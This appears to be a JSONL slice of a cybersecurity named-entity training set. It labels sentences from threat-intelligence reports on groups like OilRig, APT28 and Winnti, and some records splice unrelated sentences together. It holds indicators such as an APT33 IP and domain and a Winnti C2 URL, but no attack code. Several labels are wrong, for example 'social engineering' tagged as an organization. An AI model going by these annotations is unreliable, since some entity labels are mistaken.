{"text": "The transaction would only be authorized after the client enters the TAN into the online banking website in their browser . In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . Based on previously observed tactics , it is highly likely the OilRig group leveraged credential harvesting and compromised accounts to use the government agency as a launching platform for their true attacks .", "spans": {"ORGANIZATION: Unit 42": [[134, 141]], "THREAT_ACTOR: cybercriminals": [[242, 256]], "THREAT_ACTOR: OilRig group": [[355, 367]], "MALWARE: credential harvesting": [[378, 399]], "MALWARE: compromised accounts": [[404, 424]], "ORGANIZATION: government agency": [[436, 453]]}, "info": {"id": "cyberner_stix_train_003147", "source": "cyberner_stix_train"}}
{"text": "The link directs them to a malicious web page , which prompts them to download an Android application package ( APK ) . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file’s compilation date . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": {"MALWARE: sample": [[166, 172]], "THREAT_ACTOR: Gamaredon": [[379, 388]]}, "info": {"id": "cyberner_stix_train_003148", "source": "cyberner_stix_train"}}
{"text": "Microsoft Threat Intelligence associates Winnti with multiple activity groups—collections of malware , supporting infrastructure , online personas , victimology , and other attack artifacts that the Microsoft intelligent security graph uses to categorize and attribute threat activity .", "spans": {"ORGANIZATION: Microsoft Threat Intelligence": [[0, 29]], "MALWARE: Winnti": [[41, 47]], "ORGANIZATION: Microsoft intelligent security graph": [[199, 235]]}, "info": {"id": "cyberner_stix_train_003149", "source": "cyberner_stix_train"}}
{"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": {"TOOL: NetTraveler": [[24, 35]], "VULNERABILITY: CVE-2012-0158": [[57, 70]], "TOOL: NetTraveler Trojan": [[82, 100]], "THREAT_ACTOR: Advanced Persistent": [[155, 174]], "THREAT_ACTOR: Threat ( APT ) 40": [[175, 192]], "THREAT_ACTOR: Periscope": [[207, 216]]}, "info": {"id": "cyberner_stix_train_003150", "source": "cyberner_stix_train"}}
{"text": "Victims were recorded in the UK , Poland , Russia and China .", "spans": {}, "info": {"id": "cyberner_stix_train_003151", "source": "cyberner_stix_train"}}
{"text": "The success is largely the result of the malware 's ability to silently root a large percentage of the phones it infects by exploiting vulnerabilities that remain unfixed in older versions of Android . It 's possible that Lazarus is using RATANKBA to target larger organizations . APT33 : 5.187.21.70 microsoftupdated.com . On the left , the stolen credit card data is sent via a WebSocket skimmer while on the right , it is a POST request : In the past months there have been several Magecart skimmers abusing Google Tag Manager in one way or another .", "spans": {"VULNERABILITY: vulnerabilities that remain unfixed in older versions of Android": [[135, 199]], "THREAT_ACTOR: Lazarus": [[222, 229]], "TOOL: RATANKBA": [[239, 247]], "THREAT_ACTOR: APT33": [[281, 286]], "IP_ADDRESS: 5.187.21.70": [[289, 300]], "DOMAIN: microsoftupdated.com": [[301, 321]], "MALWARE: Magecart skimmers": [[485, 502]], "TOOL: Google Tag Manager": [[511, 529]]}, "info": {"id": "cyberner_stix_train_003152", "source": "cyberner_stix_train"}}
{"text": "A Bootkit is a rootkit malware variant which infects the device at start-up and may encrypt disk or steal data , remove the application , open connection for Command and controller . \" Machete \" is a targeted attack campaign with Spanish speaking roots . APT1 is believed to be the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 . The code of the exploit is very similar to the one published in the Metasploit kit , but the inner class that disables the security manager is encoded differently , most likely to avoid detection .", "spans": {"THREAT_ACTOR: APT1": [[255, 259]], "ORGANIZATION: Bureau of the People ’s Liberation Army": [[286, 325]], "ORGANIZATION: PLA": [[328, 331]], "ORGANIZATION: General Staff Department": [[334, 358]], "ORGANIZATION: GSD": [[364, 367]], "ORGANIZATION: Military Unit Cover Designator": [[423, 453]], "ORGANIZATION: MUCD": [[456, 460]], "ORGANIZATION: Unit 61398": [[466, 476]]}, "info": {"id": "cyberner_stix_train_003153", "source": "cyberner_stix_train"}}
{"text": "All of that is to say , the decoy documents leveraged in this campaign would likely be relevant and of interest to a variety of targets in Israel and Palestine , consistent with previously identified KASPERAGENT targeting patterns .", "spans": {"MALWARE: KASPERAGENT": [[200, 211]]}, "info": {"id": "cyberner_stix_train_003154", "source": "cyberner_stix_train"}}
{"text": "The same wrapper has also been used to wrap legitimate executable files , which were then made available for users to download from torrent sites .", "spans": {}, "info": {"id": "cyberner_stix_train_003155", "source": "cyberner_stix_train"}}
{"text": "The samples date from April – May 2017 , coinciding with the run up to the May 2017 Palestinian Authority elections .", "spans": {"ORGANIZATION: Palestinian Authority": [[84, 105]]}, "info": {"id": "cyberner_stix_train_003156", "source": "cyberner_stix_train"}}
{"text": "Both of these libraries are runtime libraries related to Dalvik and ART runtime environments . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The use of spear-phishing emails , malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": {"SYSTEM: Dalvik": [[57, 63]], "SYSTEM: ART": [[68, 71]], "TOOL: FrozenCell masquerades": [[95, 117]], "ORGANIZATION: Facebook": [[160, 168]], "ORGANIZATION: WhatsApp": [[171, 179]], "ORGANIZATION: Messenger": [[182, 191]], "ORGANIZATION: LINE": [[194, 198]], "ORGANIZATION: LoveChat": [[205, 213]], "MALWARE: RAT": [[275, 278]], "ORGANIZATION: CrySyS Lab": [[407, 417]], "THREAT_ACTOR: unknown threat actor": [[518, 538]]}, "info": {"id": "cyberner_stix_train_003157", "source": "cyberner_stix_train"}}
{"text": "In this analysis , we get into the capabilities of the new variant and what we found to be a “ kill switch ” that can eliminate the malware remotely from an infected device . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . On January 8 , 2018 , Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East .", "spans": {"THREAT_ACTOR: actor": [[179, 184]], "VULNERABILITY: CVE-2018–8440": [[205, 218]], "VULNERABILITY: vulnerability": [[247, 260]], "VULNERABILITY: proof-of-concept": [[383, 399]], "VULNERABILITY: exploit": [[400, 407]], "ORGANIZATION: Unit 42": [[432, 439]], "THREAT_ACTOR: OilRig": [[453, 459]], "ORGANIZATION: insurance agency": [[499, 515]]}, "info": {"id": "cyberner_stix_train_003158", "source": "cyberner_stix_train"}}
{"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty . Winnti mode of operation to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . Hackers usually take precautions , which experts refer to as Opsec .", "spans": {"ORGANIZATION: Cylance": [[0, 7]], "THREAT_ACTOR: OceanLotus": [[60, 70]], "THREAT_ACTOR: APT32": [[87, 92]], "THREAT_ACTOR: Cobalt Kitty": [[95, 107]], "THREAT_ACTOR: Winnti": [[110, 116]], "ORGANIZATION: charts of companies": [[180, 199]], "ORGANIZATION: individual business units": [[252, 277]], "THREAT_ACTOR: Hackers": [[315, 322]]}, "info": {"id": "cyberner_stix_train_003159", "source": "cyberner_stix_train"}}
{"text": "While studying Truvasys , Microsoft uncovered a previously undocumented piece of malware known as Myntor that is a completely separate malware family . The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": {"TOOL: Truvasys": [[15, 23]], "ORGANIZATION: Microsoft": [[26, 35]], "TOOL: Myntor": [[98, 104]], "MALWARE: Potao": [[188, 193]]}, "info": {"id": "cyberner_stix_train_003160", "source": "cyberner_stix_train"}}
{"text": "Winexe acts as a Windows service that can be configured to automatically start at boot and silently wait for incoming commands over a named pipe .", "spans": {"TOOL: Winexe": [[0, 6]], "SYSTEM: Windows": [[17, 24]]}, "info": {"id": "cyberner_stix_train_003161", "source": "cyberner_stix_train"}}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]], "FILEPATH: Filensfer": [[147, 156]]}, "info": {"id": "cyberner_stix_train_003162", "source": "cyberner_stix_train"}}
{"text": "Content observers : use Android 's ContentObserver framework to gather changes in SMS , Calendar , Contacts , Cell info , Email , WhatsApp , Facebook , Twitter , Kakao , Viber , and Skype . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy . Winnti : dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php . As we 've discussed recently , there has been huge growth in the ransomware and extortion space , potentially linked to the plethora of leaked builders and source code related to various ransomware cartels .", "spans": {"SYSTEM: Android": [[24, 31]], "SYSTEM: SMS": [[82, 85]], "SYSTEM: Calendar": [[88, 96]], "SYSTEM: Contacts": [[99, 107]], "SYSTEM: Cell info": [[110, 119]], "SYSTEM: Email": [[122, 127]], "SYSTEM: WhatsApp": [[130, 138]], "SYSTEM: Facebook": [[141, 149]], "SYSTEM: Twitter": [[152, 159]], "SYSTEM: Kakao": [[162, 167]], "SYSTEM: Viber": [[170, 175]], "SYSTEM: Skype": [[182, 187]], "THREAT_ACTOR: Leviathan": [[194, 203]], "ORGANIZATION: universities": [[276, 288]], "ORGANIZATION: military": [[294, 302]], "ORGANIZATION: Navy": [[346, 350]], "THREAT_ACTOR: Winnti": [[353, 359]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[391, 449]]}, "info": {"id": "cyberner_stix_train_003163", "source": "cyberner_stix_train"}}
{"text": "] 923525 [ . APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . However the metadata clearly showed that the documents prepared for this campaign were initially saved on December 17 , 2018 and have continued to be updated through January 21 , 2019 . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"THREAT_ACTOR: APT28": [[13, 18]], "VULNERABILITY: EternalBlue exploit": [[59, 78]], "TOOL: open source tool": [[87, 103]], "TOOL: Responder": [[104, 113]], "VULNERABILITY: server - side request forgery ( SSRF": [[408, 444]]}, "info": {"id": "cyberner_stix_train_003164", "source": "cyberner_stix_train"}}
{"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]], "THREAT_ACTOR: Wild Neutron": [[206, 218]], "MALWARE: stolen code signing certificate": [[245, 276]], "ORGANIZATION: electronics": [[300, 311]], "TOOL: Flash Player": [[338, 350]], "VULNERABILITY: exploit": [[351, 358]]}, "info": {"id": "cyberner_stix_train_003165", "source": "cyberner_stix_train"}}
{"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "FILEPATH: Bemstour": [[174, 182]], "ORGANIZATION: Symantec": [[191, 199]], "VULNERABILITY: zero-day": [[273, 281]], "ORGANIZATION: Microsoft": [[311, 320]]}, "info": {"id": "cyberner_stix_train_003166", "source": "cyberner_stix_train"}}
{"text": "At least one of the binaries compiled in August had a PDB string I was able to locate online in a collection of other PDB files , so they may be introducing their malicious code into these files before compiling someone else ’s project .", "spans": {}, "info": {"id": "cyberner_stix_train_003167", "source": "cyberner_stix_train"}}
{"text": "Fortunately for us , the C2 servers for several of these documents were still operational allowing for retrieval of the malicious macro and the subsequent payloads .", "spans": {"TOOL: C2": [[25, 27]], "TOOL: malicious macro": [[120, 135]]}, "info": {"id": "cyberner_stix_train_003168", "source": "cyberner_stix_train"}}
{"text": "CVE-2015-1701 does not affect Windows 8 and later .", "spans": {"VULNERABILITY: CVE-2015-1701": [[0, 13]], "SYSTEM: Windows 8": [[30, 39]]}, "info": {"id": "cyberner_stix_train_003169", "source": "cyberner_stix_train"}}
{"text": "The C & C address and the encryption key ( one for different modifications in versions 4.x and 5.x , and distinct for different C & Cs in later versions ) are stitched into the body of the Trojan . After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims . While no phishing- or social engineering-initiated routines were observed in this campaign , we found multiple attacks over the network that are considered “ loud. ” These involved large-scale scanning operations of IP ranges intentionally launched from the command and control ( C&C ) server . Cisco Talos is aware of the recent advisory published by the U.S. Department of Health and Human Services ( HHS ) warning the healthcare industry about Rhysida ransomware activity .", "spans": {"THREAT_ACTOR: TG-3390": [[229, 236]], "TOOL: HTTPBrowser backdoor": [[250, 270]], "TOOL: command and control": [[546, 565]], "ORGANIZATION: Cisco Talos": [[583, 594]], "ORGANIZATION: U.S. Department of Health and Human Services ( HHS )": [[644, 696]], "MALWARE: Rhysida ransomware": [[735, 753]]}, "info": {"id": "cyberner_stix_train_003170", "source": "cyberner_stix_train"}}
{"text": "Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below . While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised . The adversary crafted credible email and attachment after understanding the targets and their behavior .", "spans": {"SYSTEM: Adobe Flash Player": [[0, 18]], "MALWARE: Ginp": [[170, 174]], "THREAT_ACTOR: APT10": [[262, 267]], "ORGANIZATION: Visma": [[296, 301]], "TOOL: Citrix remote desktop": [[342, 363]], "TOOL: email": [[484, 489]]}, "info": {"id": "cyberner_stix_train_003171", "source": "cyberner_stix_train"}}
{"text": "The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback . From our analysis , Honeybee submitted most of these documents from South Korea , indicating that some of the targeting was in South Korea . idc.load_and_run_plugin Additionally , 20 said they had experienced data breaches by former employees .", "spans": {"THREAT_ACTOR: Honeybee": [[172, 180]]}, "info": {"id": "cyberner_stix_train_003172", "source": "cyberner_stix_train"}}
{"text": "This write-up will survey notables in the past year of 2017 Sofacy activity , including their targeting , technology , and notes on their infrastructure .", "spans": {"THREAT_ACTOR: Sofacy": [[60, 66]]}, "info": {"id": "cyberner_stix_train_003173", "source": "cyberner_stix_train"}}
{"text": "'' This is a trojan with many built-in capabilities . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"ORGANIZATION: CERT 360": [[154, 162]], "THREAT_ACTOR: BITTER APT": [[184, 194]], "THREAT_ACTOR: APT33": [[218, 223]], "TOOL: emails": [[244, 250]], "ORGANIZATION: employees": [[254, 263]], "ORGANIZATION: aviation industry": [[290, 307]]}, "info": {"id": "cyberner_stix_train_003174", "source": "cyberner_stix_train"}}
{"text": "] it Catania server2cz.exodus.connexxa [ . XENOTIME is easily the most dangerous threat activity publicly known . computer name , username , and GUID . av : Name of detected antivirus . osversion : version of the operating system . aname : the location of the malware on the infected machine . Initially , the group claimed DDoS attacks against entities located in Western countries , seemingly prioritizing Sweden , the Netherlands , and Denmark .", "spans": {"THREAT_ACTOR: XENOTIME": [[43, 51]], "TOOL: GUID": [[145, 149]], "THREAT_ACTOR: DDoS attacks": [[324, 336]]}, "info": {"id": "cyberner_stix_train_003175", "source": "cyberner_stix_train"}}
{"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed .", "spans": {"MALWARE: HIGHNOON": [[74, 82]], "THREAT_ACTOR: Winnti": [[121, 127]], "ORGANIZATION: defense contractors": [[429, 448]]}, "info": {"id": "cyberner_stix_train_003176", "source": "cyberner_stix_train"}}
{"text": "Conclusions Every day , there are hundreds if not thousands of targeted attacks against Tibetan and Uyghur supporters . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations .", "spans": {"VULNERABILITY: CVE-2012-0773": [[124, 137]], "ORGANIZATION: social engineering": [[232, 250]], "ORGANIZATION: Microsoft": [[293, 302], [347, 356]], "SYSTEM: Windows": [[303, 310]], "MALWARE: remote administration tools": [[403, 430]], "MALWARE: RATs": [[433, 437]], "ORGANIZATION: oil and gas": [[562, 573]]}, "info": {"id": "cyberner_stix_train_003177", "source": "cyberner_stix_train"}}
{"text": "From mid-2017 to mid-2018 , Whitefly launched targeted attacks against multiple organizations . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": {"THREAT_ACTOR: Whitefly": [[28, 36]], "THREAT_ACTOR: Rocke": [[127, 132]], "VULNERABILITY: exploit": [[193, 200]], "VULNERABILITY: CVE-2018-1000861": [[201, 217]], "VULNERABILITY: CVE-2019-1003000": [[222, 238]]}, "info": {"id": "cyberner_stix_train_003178", "source": "cyberner_stix_train"}}
{"text": "While it is not surprising that the Dukes reacted to multiple companies publishing extensive reports on one of their key toolsets , it is valuable to note the manner in which they responded .", "spans": {"THREAT_ACTOR: Dukes": [[36, 41]]}, "info": {"id": "cyberner_stix_train_003179", "source": "cyberner_stix_train"}}
{"text": "TA505 is arguably one of the most significant financially motivated threat actors because of the extraordinary volumes of messages they send .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]]}, "info": {"id": "cyberner_stix_train_003180", "source": "cyberner_stix_train"}}
{"text": "Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org . MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East . The DLL located in the Media registry key is a variant of the KHRAT Troja S-MALn E-MAL . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"THREAT_ACTOR: MuddyWater": [[143, 153]], "TOOL: DLL": [[272, 275]], "TOOL: Media registry": [[291, 305]], "MALWARE: KHRAT": [[330, 335]], "MALWARE: Troja S-MALn E-MAL": [[336, 354]], "TOOL: Microsoft Exchange server": [[507, 532]]}, "info": {"id": "cyberner_stix_train_003181", "source": "cyberner_stix_train"}}
{"text": "These could include resetting the user ’ s PIN , enabling or disabling various alerts and confirmations , and confirming the user ’ s identity . Between May and June 2018 , Unit 42 observed multiple attacks by the OilRig group appearing to originate from a government agency in the Middle East . Even while using these services , the authors of this JhoneRAT went further and used different user-agent strings depending on the request , and even on the downloaders the authors used other user-agent strings . Monitor MSSQL Servers with access to OT systems and networks for evidence of : • Reconnaissance and enumeration activity of MSSQL servers and credentials .", "spans": {"ORGANIZATION: Unit 42": [[173, 180]], "THREAT_ACTOR: OilRig group": [[214, 226]], "ORGANIZATION: government agency": [[257, 274]], "MALWARE: JhoneRAT": [[350, 358]]}, "info": {"id": "cyberner_stix_train_003182", "source": "cyberner_stix_train"}}
{"text": "By analyzing running processes on the infected device , it shows that the malware creates a child process of itself to perform the multi-process ptrace anti-debugging technique . Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . All contain the same Visual Basic macro code and author name as Honeybee .", "spans": {"THREAT_ACTOR: actors": [[229, 235]], "VULNERABILITY: CVE-2019-0604": [[245, 258]], "TOOL: China Chopper webshell": [[304, 326]], "THREAT_ACTOR: Honeybee": [[393, 401]]}, "info": {"id": "cyberner_stix_train_003183", "source": "cyberner_stix_train"}}
{"text": "It extracts and decrypts the stage 3 malware , which is stored in encrypted resources such as fake dialog boxes . APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values . For these reasons , OT defenders and asset owners should take mitigating actions against COSMICENERGY to preempt in the wild deployment and to better understand common features and capabilities that are frequently deployed in OT malware .", "spans": {"THREAT_ACTOR: APT33": [[114, 119]], "TOOL: public and non-public tools": [[139, 166]], "TOOL: ALFA TEaM Shell": [[252, 267]], "TOOL: publicly available web shell": [[274, 302]], "ORGANIZATION: OT defenders": [[551, 563]], "ORGANIZATION: asset owners": [[568, 580]], "MALWARE: COSMICENERGY": [[620, 632]]}, "info": {"id": "cyberner_stix_train_003184", "source": "cyberner_stix_train"}}
{"text": "Analysis into the two binaries shows that they are in fact a Delphi ( initially UPX packed ) and .NET version of the Zekapab first-stage malware .", "spans": {"TOOL: Delphi": [[61, 67]], "TOOL: UPX": [[80, 83]], "TOOL: .NET": [[97, 101]], "MALWARE: Zekapab": [[117, 124]]}, "info": {"id": "cyberner_stix_train_003185", "source": "cyberner_stix_train"}}
{"text": "Also , the fact the initial macro uses this dropped document for the execution of the payload may also explain why the document did not contain any decoy contents .", "spans": {"TOOL: macro": [[28, 33]]}, "info": {"id": "cyberner_stix_train_003186", "source": "cyberner_stix_train"}}
{"text": "These organizations included :", "spans": {}, "info": {"id": "cyberner_stix_train_003187", "source": "cyberner_stix_train"}}
{"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[138, 141]], "THREAT_ACTOR: Threat Group-1314": [[195, 212]]}, "info": {"id": "cyberner_stix_train_003189", "source": "cyberner_stix_train"}}
{"text": "The user agent string employed is “ MSIE 8.0 ” .", "spans": {"TOOL: MSIE": [[36, 40]]}, "info": {"id": "cyberner_stix_train_003190", "source": "cyberner_stix_train"}}
{"text": "After performing a fraudulent action , stealing the OTP/mTAN , TrickMo buys some time by activating the lock screen and preventing the user from accessing their device . The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . Lua modules is a technique that has previously been used by Flamer .", "spans": {"MALWARE: TrickMo": [[63, 70]], "TOOL: BokBot malware": [[174, 188]], "MALWARE: Lua modules": [[365, 376]]}, "info": {"id": "cyberner_stix_train_003191", "source": "cyberner_stix_train"}}
{"text": "However , because dnc.org email accounts were targeted in the same way as hillaryclinton.com accounts , it is likely that dnc.org did use Gmail at that time and later moved to a different service .", "spans": {"DOMAIN: dnc.org": [[18, 25], [122, 129]], "TOOL: email": [[26, 31]], "DOMAIN: hillaryclinton.com": [[74, 92]], "TOOL: Gmail": [[138, 143]]}, "info": {"id": "cyberner_stix_train_003192", "source": "cyberner_stix_train"}}
{"text": "The Dukes appear to prioritize the continuation of their operations over stealth .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_003193", "source": "cyberner_stix_train"}}
{"text": "Notably , this operation marked the first time Lazarus had targeted macOS users , with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of trust among potential victims .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]], "SYSTEM: macOS": [[68, 73]]}, "info": {"id": "cyberner_stix_train_003194", "source": "cyberner_stix_train"}}
{"text": "Execute commands on the infected machine .", "spans": {}, "info": {"id": "cyberner_stix_train_003195", "source": "cyberner_stix_train"}}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "MALWARE: KeyBoy backdoor": [[181, 196]], "ORGANIZATION: Rapid7": [[224, 230]]}, "info": {"id": "cyberner_stix_train_003196", "source": "cyberner_stix_train"}}
{"text": "From an external analysts ’ point of view , the wonder is , which is superior to the other .", "spans": {}, "info": {"id": "cyberner_stix_train_003197", "source": "cyberner_stix_train"}}
{"text": "Protecting organizations from threats across domains and platforms Mobile threats continue to rapidly evolve , with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal , whether financial gain or finding an entry point to broader network compromise . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . The tool can work for almost all obfuscated functions in the tested sample . Mandiant is investigating multiple instances of successful exploitation of CVE-2023 - 4966 that resulted in the takeover of legitimate user sessions on NetScaler ADC and Gateway appliances .", "spans": {"THREAT_ACTOR: Ke3chang": [[338, 346]], "THREAT_ACTOR: attackers": [[347, 356]], "VULNERABILITY: CVE-2023 - 4966": [[610, 625]]}, "info": {"id": "cyberner_stix_train_003198", "source": "cyberner_stix_train"}}
{"text": "This is the first time we have seen APT28 incorporate this exploit into their intrusions .", "spans": {"THREAT_ACTOR: APT28": [[36, 41]]}, "info": {"id": "cyberner_stix_train_003199", "source": "cyberner_stix_train"}}
{"text": "The malicious developer ’ s apps published on the App Store which don ’ t contain the Ashas adware Searching further for the malicious developer ’ s activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": {"MALWARE: Ashas": [[86, 91], [217, 222]], "SYSTEM: Youtube": [[185, 192]], "MALWARE: flare-qdb": [[273, 282]], "FILEPATH: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f": [[350, 414]]}, "info": {"id": "cyberner_stix_train_003200", "source": "cyberner_stix_train"}}
{"text": "An organization whose certificate has been stolen and used to sign malware will always be associated with that activity .", "spans": {}, "info": {"id": "cyberner_stix_train_003201", "source": "cyberner_stix_train"}}
{"text": "Figure 8 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": {"THREAT_ACTOR: Waterbug": [[11, 19]], "TOOL: Meterpreter": [[35, 46], [125, 136]], "THREAT_ACTOR: actor": [[278, 283]], "MALWARE: Bankshot": [[375, 383]]}, "info": {"id": "cyberner_stix_train_003202", "source": "cyberner_stix_train"}}
{"text": "While the malware is custom , it only provides the attackers with standard back door capabilities .", "spans": {"TOOL: back door": [[75, 84]]}, "info": {"id": "cyberner_stix_train_003203", "source": "cyberner_stix_train"}}
{"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: Visma": [[120, 125]], "TOOL: Dropbox API": [[141, 152]], "MALWARE: malware": [[203, 210]], "FILEPATH: Bluetooth device harvester": [[244, 270]]}, "info": {"id": "cyberner_stix_train_003204", "source": "cyberner_stix_train"}}
{"text": "According to publicly available statistics , as well as confirmation from Google , most of these apps collected a few dozens installations each , with one case reaching over 350 . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East . As we explained before , the RAT targets specific countries by checking the keyboard 's layout . We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : • Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": {"ORGANIZATION: Google": [[74, 80]], "ORGANIZATION: Unit 42": [[180, 187]], "THREAT_ACTOR: threat actors": [[248, 261]], "TOOL: RAT": [[436, 439]], "ORGANIZATION: risk organizations": [[520, 538]], "SYSTEM: human - machine interfaces ( HMI": [[783, 815]], "SYSTEM: engineering workstations": [[820, 844]], "SYSTEM: EWS": [[847, 850]], "SYSTEM: OPC client servers within their environments": [[859, 903]]}, "info": {"id": "cyberner_stix_train_003205", "source": "cyberner_stix_train"}}
{"text": "In a brief stint , TA505 distributed it in one large campaign in July , but we have not seen them use it since .", "spans": {"THREAT_ACTOR: TA505": [[19, 24]]}, "info": {"id": "cyberner_stix_train_003206", "source": "cyberner_stix_train"}}
